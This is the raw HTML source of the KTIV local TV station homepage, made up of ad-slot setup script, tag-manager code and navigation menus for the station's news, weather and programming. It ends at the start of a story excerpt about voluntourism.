content="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2018/05/21151732/cropped-ktiv-e1526493608612-270x270.png" /> <script> var googletag = googletag || {}; // Empty ad behavior googletag.pubads().addEventListener('slotRenderEnded', function (event) { var elementId = event.slot.getSlotElementId(); var el = document.getElementById(elementId); var targetParentClass = 'elementor-widget-wp-widget-ad_placement'; if (event.isEmpty && el.classList.contains('div-gpt-widget')) { // Find parent element with targetParentClass while ((el = el.parentElement) && !el.classList.contains(targetParentClass)); if (el) { el.classList.add("no-ad"); } } }); googletag.cmd = googletag.cmd || []; googletag.cmd.push(function () { var mapping1 = googletag.sizeMapping(). addSize([1024,0],[300, 250]). //desktop addSize([0,0],[300, 250]). //mobile build(); googletag.cmd.push(function() { googletag.defineSlot('/21720672171/ktiv/ktiv.com/1:1_a', [300,250], 'div-gpt-ad-1') .defineSizeMapping(mapping1) .setTargeting("wp_unit", "1:1_A Medium_Rectangle") .setCollapseEmptyDiv(true) .addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); var mapping2 = googletag.sizeMapping(). addSize([1024,0],[300, 250]). //desktop addSize([0,0],[300, 250]). //mobile build(); googletag.cmd.push(function() { googletag.defineSlot('/21720672171/ktiv/ktiv.com/1:1_b', [300,250], 'div-gpt-ad-2') .defineSizeMapping(mapping2) .setTargeting("wp_unit", "1:1_B Medium_Rectangle") .setCollapseEmptyDiv(true) .addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); var mapping3 = googletag.sizeMapping(). addSize([1024,0],[[728,90], [728,90]]). //desktop addSize([0,0],[320, 50]). //mobile build(); googletag.cmd.push(function() { googletag.defineSlot('/21720672171/ktiv/ktiv.com/8:1_a', [[728,90],[728,90],[320,50]], 'div-gpt-ad-3') .defineSizeMapping(mapping3) .setTargeting("wp_unit", "8:1_A Leaderboard") .setCollapseEmptyDiv(true) .addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); var mapping4 = googletag.sizeMapping(). addSize([1024,0],[728, 90]). //desktop addSize([0,0],[320, 50]). //mobile build(); googletag.cmd.push(function() { googletag.defineSlot('/21720672171/ktiv/ktiv.com/8:1_b', [[728,90],[320,50]], 'div-gpt-ad-4') .defineSizeMapping(mapping4) .setTargeting("wp_unit", "8:1_B Leaderboard") .setCollapseEmptyDiv(true) .addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); var mapping5 = googletag.sizeMapping(). addSize([1024,0],[1, 1]). //desktop addSize([0,0],[]). //mobile build(); googletag.cmd.push(function() { googletag.defineSlot('/21720672171/ktiv/ktiv.com/outofpage/floorboard', [1,1], 'div-gpt-ad-5') .defineSizeMapping(mapping5) .setTargeting("wp_unit", "Floorboard") .setCollapseEmptyDiv(true) .addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); googletag.pubads().setTargeting("wp_category", ["homepage"]); googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); </script> </head> <body class="home page-template-default page page-id-12 layout-full-width elementor-default elementor-page elementor-page-12 format-text "> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-T7J729R" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --><br style="display:none;"> <!--[if lt IE 7]><p class="chromeframe">Your browser is <em>ancient!</em> <a href="http://browsehappy.com/">Upgrade to a different browser</a> or <a href="http://www.google.com/chromeframe/?redirect=true">install Google Chrome Frame</a> to experience this site. </p><![endif]--> <div id="container"> <section id="top-bar"> <div class="container"> <div class="pull-left"> </div> <div class="pull-right"> </div> </div><!-- .container --> </section> <header id="header" class="logo-left" role="banner"> <div class="container"> <div class="logo"> <div class="logo-img"> <a href="https://ktiv.com/" rel="home"><img src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2018/09/05104335/ktiv-masthead-alt-2.png" alt="KTIV" class="logo-img-primary"/></a> </div> <button type="button" class="navbar-toggle visible-xs" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> </div><!--.logo --> <div class="header-widget"> </div> <nav class="nav-main" role="navigation"> <div class="navbar-collapse collapse"> <div class="nav-main-inner"> <ul id="menu-main-menu" class="sf-menu hidden-xs"><li class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-has-children active menu-home first-item menu-item-2994"><a href="https://ktiv.com/"><span>Home</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-ktiv-live-stream menu-item-3047"><a href="https://ktiv.com/watch/ktiv-live-stream/"><span>KTIV Live Stream</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-news menu-item-150"><a href="https://ktiv.com/news/"><span>News</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-iowa-news menu-item-3083"><a href="https://ktiv.com/iowa-news/"><span>Iowa News</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-nebraska-news menu-item-3080"><a href="https://ktiv.com/nebraska-news/"><span>Nebraska News</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-south-dakota-news menu-item-3084"><a href="https://ktiv.com/south-dakota-news/"><span>South Dakota News</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-politics menu-item-3085"><a href="https://ktiv.com/politics/"><span>Politics</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-health menu-item-3086"><a href="https://ktiv.com/health/"><span>Health</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-2019-flooding menu-item-109999"><a href="https://ktiv.com/flooding/"><span>2019 Flooding</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-uss-sioux-city menu-item-16580"><a href="https://ktiv.com/news/uss-sioux-city/"><span>USS Sioux City</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-weather menu-item-650"><a href="https://ktiv.com/weather/"><span>Weather</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-interactive-radar menu-item-1322"><a href="https://ktiv.com/interactive-radar/"><span>Interactive Radar</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-alerts-warnings menu-item-3088"><a href="https://ktiv.com/alerts-warnings/"><span>Alerts &#038; Warnings</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-radar-room menu-item-3090"><a href="https://ktiv.com/radar-room/"><span>Radar Room</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-storm-team-4-wx-app menu-item-60111"><a href="https://ktiv.com/2018/08/13/download-the-storm-team-4-weather-app/"><span>Storm Team 4 Wx App</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-ktiv-skycam-network menu-item-3091"><a href="https://ktiv.com/ktiv-skycam-network/"><span>KTIV Skycam Network</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-maps-conditions menu-item-3089"><a href="https://ktiv.com/maps-conditions/"><span>Maps &#038; Conditions</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-closings-delays menu-item-1315"><a href="https://ktiv.com/closings/"><span>Closings &#038; Delays</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-submit-closing-or-delay menu-item-3050"><a href="https://www.secure1.newsroomsolutions.com/s/closings?client=ktiv_12kk,G"><span>Submit Closing or Delay</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-river-levels menu-item-3092"><a href="https://water.weather.gov/ahps2/hydrograph.php?wfo=fsd&amp;gage=sscn1"><span>River Levels</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-allergy-update menu-item-133045"><a href="http://ktiv.com/2019/05/06/allergy-update/"><span>Allergy Update</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-sports menu-item-244"><a href="https://ktiv.com/sports/"><span>Sports</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-things-to-do menu-item-649"><a href="https://ktiv.com/things-to-do/"><span>Things to Do</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-community-calendar menu-item-17389"><a href="https://ktiv.com/things-to-do/"><span>Community Calendar</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-contests menu-item-3098"><a href="https://ktiv.com/contests/"><span>Contests</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-submit-an-event menu-item-3100"><a href="https://www.spingo.com/submit/?partnerId=2505"><span>Submit an Event</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-whats-cookin menu-item-87434"><a href="https://ktiv.com/whats-cookin/"><span>What&#8217;s Cookin&#8217;?</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-around-siouxland menu-item-3101"><a href="https://ktiv.com/around-siouxland/"><span>Around Siouxland</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-siouxland-business-spotlight menu-item-3102"><a href="https://ktiv.com/siouxland-business-spotlight/"><span>Siouxland Business Spotlight</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-student-of-the-month menu-item-64375"><a href="https://ktiv.com/rotary-student-of-the-month/"><span>Student of the Month</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-watch menu-item-648"><a href="https://ktiv.com/watch/"><span>Watch</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-tv-listings menu-item-17422"><a href="https://ktiv.com/watch/"><span>TV Listings</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-ktiv-live-stream menu-item-3426"><a href="https://ktiv.com/watch/ktiv-live-stream/"><span>KTIV Live Stream</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-nbc menu-item-2993"><a href="https://www.nbc.com/"><span>NBC</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-siouxland-cw menu-item-3418"><a href="http://yourcwtv.com/partners/siouxcity/"><span>Siouxland CW</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-me-tv-siouxland menu-item-3104"><a href="https://www.metv.com/"><span>ME TV Siouxland</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-court-tv menu-item-129790"><a href="https://www.courttv.com/"><span>Court TV</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-ion-television menu-item-129717"><a href="https://iontelevision.com/"><span>Ion Television</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-contact menu-item-794"><a href="https://ktiv.com/contact-us/"><span>Contact</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-sign-up-for-emails menu-item-37784"><a href="https://ktiv.com/sign-up-for-ktiv-news-and-weather-emails/"><span>Sign up for Emails</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-meet-the-team menu-item-3105"><a href="https://ktiv.com/meet-the-team/"><span>Meet the Team</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-advertise menu-item-786"><a href="https://ktiv.com/advertise-with-ktiv/"><span>Advertise</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-advertiser-services menu-item-787"><a href="https://xprspay.ipayxepay.net/xprspay/qmi/index.jsp"><span>Advertiser Services</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-ktiv-careers menu-item-785"><a href="https://ktiv.com/ktiv-careers/"><span>KTIV Careers</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-quincy-media-careers menu-item-789"><a href="https://quincymediacareers.com"><span>Quincy Media Careers</span></a></li> </ul> </li> </ul><ul id="menu-mobile-menu" class="mobile-menu visible-xs"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-12 current_page_item active menu-home first-item menu-item-27352"><a href="https://ktiv.com/"><span>Home</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-ktiv-live-stream menu-item-27351"><a href="https://ktiv.com/watch/ktiv-live-stream/"><span>KTIV Live Stream</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-weather menu-item-27368"><a href="https://ktiv.com/weather/"><span>Weather</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-interactive-radar menu-item-27370"><a href="https://ktiv.com/interactive-radar/"><span>Interactive Radar</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-closings-and-delays menu-item-27353"><a href="https://ktiv.com/closings/"><span>Closings and Delays</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-submit-a-closing-or-delay menu-item-27371"><a href="https://www.secure1.newsroomsolutions.com/s/closings?client=ktiv_12kk,G"><span>Submit a Closing or Delay</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-iowa-news menu-item-27356"><a href="https://ktiv.com/iowa-news/"><span>Iowa News</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-nebraska-news menu-item-27357"><a href="https://ktiv.com/nebraska-news/"><span>Nebraska News</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-south-dakota-news menu-item-27359"><a href="https://ktiv.com/south-dakota-news/"><span>South Dakota News</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-healthbeat-4 menu-item-27350"><a href="https://ktiv.com/health/"><span>Healthbeat 4</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-politics menu-item-27358"><a href="https://ktiv.com/politics/"><span>Politics</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-sportsfource menu-item-27360"><a href="https://ktiv.com/sports/"><span>SportsFource</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-contests menu-item-27354"><a href="https://ktiv.com/contests/"><span>Contests</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-submit-an-event menu-item-27367"><a href="https://ktiv.com/submit-an-event/"><span>Submit an Event</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-watch menu-item-27369"><a href="https://ktiv.com/watch/"><span>Watch</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-advertise-with-ktiv menu-item-27349"><a href="https://ktiv.com/advertise-with-ktiv/"><span>Advertise with KTIV</span></a></li> </ul> <div class="search-header hidden-xs"> <a href="javascript:void(0);" class="search-toggle" data-target="#search-section-primary"> <i class="fa fa-search"></i> </a> </div> </div> </div> </nav><!--/#nav-menu --> </div><!-- /.container --> </header> <div class="hidden-xs"> <div id="search-section-primary" class="search-section" style="display: none;"> <div class="container"> <form role="search" method="get" class="form form-search" action="https://ktiv.com/"> <label for="s"> <span class="sr-only">Search for:</span> <input type="search" title="Search" name="s" value="" placeholder="Search..." class="field search-field"> </label> <button value="Search" class="search-submit button" type="submit">Search</button> </form><i class="fa fa-search"></i> </div> </div> </div> <section id="sub-header"> <div class="container"> <!-- <div class="pull-left">--> <!-- --> <!-- </div>--> <!-- <div class="pull-right">--> <!-- --> <!-- </div>--> </div><!-- .container --> </section> <div class="sticky-header-running"></div> <div class="sticky-header logo-left"> <div class="container"> <div class="logo"> <div class="logo-img"> <a href="https://ktiv.com/" rel="home"><img src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2018/09/05104457/ktiv-masthead-alt-2small.png" alt="KTIV" class="logo-img-secondary"/></a> </div> <button type="button" class="navbar-toggle visible-xs" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> </div><!--.logo --> <nav class="nav-main" role="navigation"> <div class="navbar-collapse collapse"> <div class="nav-main-inner"> <ul id="menu-main-menu-1" class="sf-menu hidden-xs"><li class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-has-children active first-item menu-item-2994"><a href="https://ktiv.com/"><span>Home</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3047"><a href="https://ktiv.com/watch/ktiv-live-stream/"><span>KTIV Live Stream</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-150"><a href="https://ktiv.com/news/"><span>News</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3083"><a href="https://ktiv.com/iowa-news/"><span>Iowa News</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3080"><a href="https://ktiv.com/nebraska-news/"><span>Nebraska News</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3084"><a href="https://ktiv.com/south-dakota-news/"><span>South Dakota News</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3085"><a href="https://ktiv.com/politics/"><span>Politics</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3086"><a href="https://ktiv.com/health/"><span>Health</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-109999"><a href="https://ktiv.com/flooding/"><span>2019 Flooding</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-16580"><a href="https://ktiv.com/news/uss-sioux-city/"><span>USS Sioux City</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-650"><a href="https://ktiv.com/weather/"><span>Weather</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1322"><a href="https://ktiv.com/interactive-radar/"><span>Interactive Radar</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3088"><a href="https://ktiv.com/alerts-warnings/"><span>Alerts &#038; Warnings</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3090"><a href="https://ktiv.com/radar-room/"><span>Radar Room</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-60111"><a href="https://ktiv.com/2018/08/13/download-the-storm-team-4-weather-app/"><span>Storm Team 4 Wx App</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3091"><a href="https://ktiv.com/ktiv-skycam-network/"><span>KTIV Skycam Network</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3089"><a href="https://ktiv.com/maps-conditions/"><span>Maps &#038; Conditions</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1315"><a href="https://ktiv.com/closings/"><span>Closings &#038; Delays</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3050"><a href="https://www.secure1.newsroomsolutions.com/s/closings?client=ktiv_12kk,G"><span>Submit Closing or Delay</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3092"><a href="https://water.weather.gov/ahps2/hydrograph.php?wfo=fsd&amp;gage=sscn1"><span>River Levels</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-133045"><a href="http://ktiv.com/2019/05/06/allergy-update/"><span>Allergy Update</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-244"><a href="https://ktiv.com/sports/"><span>Sports</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-649"><a href="https://ktiv.com/things-to-do/"><span>Things to Do</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17389"><a href="https://ktiv.com/things-to-do/"><span>Community Calendar</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3098"><a href="https://ktiv.com/contests/"><span>Contests</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3100"><a href="https://www.spingo.com/submit/?partnerId=2505"><span>Submit an Event</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-87434"><a href="https://ktiv.com/whats-cookin/"><span>What&#8217;s Cookin&#8217;?</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3101"><a href="https://ktiv.com/around-siouxland/"><span>Around Siouxland</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3102"><a href="https://ktiv.com/siouxland-business-spotlight/"><span>Siouxland Business Spotlight</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-64375"><a href="https://ktiv.com/rotary-student-of-the-month/"><span>Student of the Month</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-648"><a href="https://ktiv.com/watch/"><span>Watch</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17422"><a href="https://ktiv.com/watch/"><span>TV Listings</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3426"><a href="https://ktiv.com/watch/ktiv-live-stream/"><span>KTIV Live Stream</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2993"><a href="https://www.nbc.com/"><span>NBC</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3418"><a href="http://yourcwtv.com/partners/siouxcity/"><span>Siouxland CW</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3104"><a href="https://www.metv.com/"><span>ME TV Siouxland</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-129790"><a href="https://www.courttv.com/"><span>Court TV</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-129717"><a href="https://iontelevision.com/"><span>Ion Television</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-794"><a href="https://ktiv.com/contact-us/"><span>Contact</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-37784"><a href="https://ktiv.com/sign-up-for-ktiv-news-and-weather-emails/"><span>Sign up for Emails</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3105"><a href="https://ktiv.com/meet-the-team/"><span>Meet the Team</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-786"><a href="https://ktiv.com/advertise-with-ktiv/"><span>Advertise</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-787"><a href="https://xprspay.ipayxepay.net/xprspay/qmi/index.jsp"><span>Advertiser Services</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-785"><a href="https://ktiv.com/ktiv-careers/"><span>KTIV Careers</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-789"><a href="https://quincymediacareers.com"><span>Quincy Media Careers</span></a></li> </ul> </li> </ul><ul id="menu-mobile-menu-1" class="mobile-menu visible-xs"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-12 current_page_item active first-item menu-item-27352"><a href="https://ktiv.com/"><span>Home</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27351"><a href="https://ktiv.com/watch/ktiv-live-stream/"><span>KTIV Live Stream</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27368"><a href="https://ktiv.com/weather/"><span>Weather</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27370"><a href="https://ktiv.com/interactive-radar/"><span>Interactive Radar</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27353"><a href="https://ktiv.com/closings/"><span>Closings and Delays</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27371"><a href="https://www.secure1.newsroomsolutions.com/s/closings?client=ktiv_12kk,G"><span>Submit a Closing or Delay</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27356"><a href="https://ktiv.com/iowa-news/"><span>Iowa News</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27357"><a href="https://ktiv.com/nebraska-news/"><span>Nebraska News</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27359"><a href="https://ktiv.com/south-dakota-news/"><span>South Dakota News</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27350"><a href="https://ktiv.com/health/"><span>Healthbeat 4</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27358"><a href="https://ktiv.com/politics/"><span>Politics</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27360"><a href="https://ktiv.com/sports/"><span>SportsFource</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27354"><a href="https://ktiv.com/contests/"><span>Contests</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27367"><a href="https://ktiv.com/submit-an-event/"><span>Submit an Event</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27369"><a href="https://ktiv.com/watch/"><span>Watch</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-27349"><a href="https://ktiv.com/advertise-with-ktiv/"><span>Advertise with KTIV</span></a></li> </ul> <div class="search-header hidden-xs"> <a href="javascript:void(0);" class="search-toggle" data-target="#search-section-sticky"> <i class="fa fa-search"></i> </a> </div> </div> </div> </nav><!--.nav-menu --> </div><!-- /.container --> <div class="hidden-xs"> <div id="search-section-sticky" class="search-section" style="display: none;"> <div class="container"> <form role="search" method="get" class="form form-search" action="https://ktiv.com/"> <label for="s"> <span class="sr-only">Search for:</span> <input type="search" title="Search" name="s" value="" placeholder="Search..." class="field search-field"> </label> <button value="Search" class="search-submit button" type="submit">Search</button> </form> </div> </div> </div> </div> <div class="layout-content boxed"> <!-- Layout Content --> <div id="primary"> <div class="container"> <div id="content" class="row"> <section id="main" class="col-sm-12 col-md-12 full-width" role="main"> <article id="post-12" class="post-12 page type-page status-publish hentry category-homepage tag-iowa tag-ktiv tag-nebraska tag-news tag-sioux-city tag-siouxland tag-south-dakota "> <div class="entry-page"> <div class="entry-content"> <div class="elementor elementor-12"> <div class="elementor-inner"> <div class="elementor-section-wrap"> <section data-id="7737961" class="elementor-element elementor-element-7737961 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="14895cb" class="elementor-element elementor-element-14895cb elementor-column elementor-col-100 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="d87978e" class="elementor-element elementor-element-d87978e elementor-widget elementor-widget-wp-widget-breaking_news" data-element_type="wp-widget-breaking_news.default"> <div class="elementor-widget-container"> <div id="breaking-news-app"></div> </div> </div> </div> </div> </div> </div> </div> </section> <section data-id="24d2f886" class="elementor-element elementor-element-24d2f886 elementor-section-full_width elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="e25f180" class="elementor-element elementor-element-e25f180 elementor-column elementor-col-100 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <section data-id="259c6618" class="elementor-element elementor-element-259c6618 elementor-section-full_width elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-no"> <div class="elementor-row"> <div data-id="2995d6e8" class="elementor-element elementor-element-2995d6e8 elementor-column elementor-col-66 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="1b2858d4" class="elementor-element elementor-element-1b2858d4 elementor-grid-1 elementor-grid-tablet-1 elementor-grid-mobile-1 elementor-posts--thumbnail-top elementor-widget elementor-widget-posts" data-settings="{&quot;classic_columns&quot;:&quot;1&quot;,&quot;classic_columns_tablet&quot;:&quot;1&quot;,&quot;classic_row_gap&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:0},&quot;classic_columns_mobile&quot;:&quot;1&quot;}" data-element_type="posts.classic"> <div class="elementor-widget-container"> <div class="elementor-posts-container elementor-posts elementor-grid elementor-posts--skin-classic"> <article class="elementor-post elementor-grid-item post-138208 post type-post status-publish format-image has-post-thumbnail hentry category-content-bucket category-top-stories tag-tourism tag-travel tag-volunteering post_format-post-format-image "> <a class="elementor-post__thumbnail__link" href="https://ktiv.com/2019/05/16/voluntourism-giving-back-on-the-road/"> <div class="elementor-post__thumbnail"><img width="800" height="450" src="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/CN11W-VOLUNTOURISM-0100-MCLAUGHLIN-KTIV.jpg" class="attachment-large size-large" alt="" srcset="https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/CN11W-VOLUNTOURISM-0100-MCLAUGHLIN-KTIV.jpg 800w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/CN11W-VOLUNTOURISM-0100-MCLAUGHLIN-KTIV-300x169.jpg 300w, https://s3-ca-central-1.amazonaws.com/quincy-network/wp-content/uploads/sites/4/2019/05/CN11W-VOLUNTOURISM-0100-MCLAUGHLIN-KTIV-768x432.jpg 768w" sizes="(max-width: 800px) 100vw, 800px" /></div> </a> <div class="elementor-post__text"> <h3 class="elementor-post__title"> <a href="https://ktiv.com/2019/05/16/voluntourism-giving-back-on-the-road/"> Voluntourism: giving back on the road </a> </h3> <div class="elementor-post__excerpt"> <p>More travelers are taking time to 